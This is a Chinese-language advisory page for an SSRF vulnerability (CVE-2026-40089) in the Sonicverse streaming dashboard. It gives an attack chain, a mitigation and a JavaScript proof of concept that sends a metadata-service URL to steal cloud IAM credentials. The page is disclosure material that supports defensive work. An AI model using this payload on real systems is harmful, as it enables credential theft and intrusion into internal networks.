CVE-2026-40089 CVSS 9.9 严重

CVE-2026-40089 Sonicverse仪表盘SSRF漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40089

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Sonicverse Radio Audio Streaming Stack

漏洞概述

Sonicverse是一个自托管的实时流媒体堆栈。其仪表盘API客户端存在服务器端请求伪造（SSRF）漏洞。由于缺乏对用户输入URL的充分验证，经过身份验证的操作员可以利用此漏洞，通过仪表盘后端向内部或外部系统发起任意HTTP请求。

技术细节

该漏洞位于Sonicverse仪表盘的API客户端代码文件（apps/dashboard/lib/api.ts）中。在使用提供的install.sh脚本创建的安装环境中，仪表盘接受用户控制的URL参数，并将其直接传递给服务器端的HTTP客户端进行处理，而未对目标地址进行白名单校验或格式检查。攻击者只需拥有低权限的操作员账户，即可滥用该功能。他们可以构造恶意请求，诱导后端服务器向内部网络资源（如元数据服务、内网管理接口）或外部系统发起HTTP请求，从而绕过防火墙限制，导致敏感信息泄露或内网被进一步渗透。

攻击链分析

STEP 1

1. 获取凭证

攻击者注册或获取一个低权限的操作员账户。

STEP 2

2. 识别漏洞点

分析仪表盘API客户端代码，发现接受URL参数且未做校验的接口。

STEP 3

3. 构造恶意载荷

攻击者构造包含内网敏感地址（如云元数据服务）的URL参数。

STEP 4

4. 发起SSRF请求

攻击者向仪表盘后端发送包含恶意URL的API请求。

STEP 5

5. 获取敏感信息

后端服务器代为请求内网地址，并将响应返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-40089 Sonicverse SSRF
// Description: Exploiting the SSRF in the dashboard API client to access internal metadata.

const targetUrl = 'http://<TARGET-DASHBOARD-HOST>/api/endpoint';
const internalTarget = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/';

fetch(targetUrl, {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer <VALID_OPERATOR_TOKEN>'
    },
    body: JSON.stringify({
        url: internalTarget
    })
})
.then(response => response.text())
.then(data => console.log('Leaked Data:', data))
.catch(err => console.error('Exploit failed:', err));

影响范围

Sonicverse Radio Audio Streaming Stack (Commit cb1ddbacafcb441549fe87d3eeabdb6a085325e4 之前)

防御指南

临时缓解措施

建议立即通过防火墙或安全组规则，限制Sonicverse仪表盘容器对内部网络（特别是169.254.169.254等元数据地址）的出站访问，直到升级完成。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表